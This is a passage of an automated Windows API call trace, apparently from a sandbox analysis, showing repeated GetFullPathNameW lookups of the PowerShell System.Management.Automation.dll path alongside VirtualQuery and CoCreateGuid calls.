	[0351.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.340] VirtualQuery (in: lpAddress=0x1cb780, lpBuffer=0x1cc640, dwLength=0x30 | out: lpBuffer=0x1cc640*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.341] VirtualQuery (in: lpAddress=0x1cb810, lpBuffer=0x1cc6d0, dwLength=0x30 | out: lpBuffer=0x1cc6d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.349] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.350] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.365] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.365] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.366] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.367] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.367] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.367] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.367] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.367] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.368] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.368] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.368] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.368] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.368] VirtualQuery (in: lpAddress=0x1cbbc0, lpBuffer=0x1cca80, dwLength=0x30 | out: lpBuffer=0x1cca80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.368] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.369] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.369] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.369] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.369] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x11012d3c, Data2=0xd7db, Data3=0x4fcc, Data4=([0]=0xb6, [1]=0x8d, [2]=0x2d, [3]=0xd4, [4]=0x1b, [5]=0x54, [6]=0xf5, [7]=0x39))) returned 0x0
	[0351.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
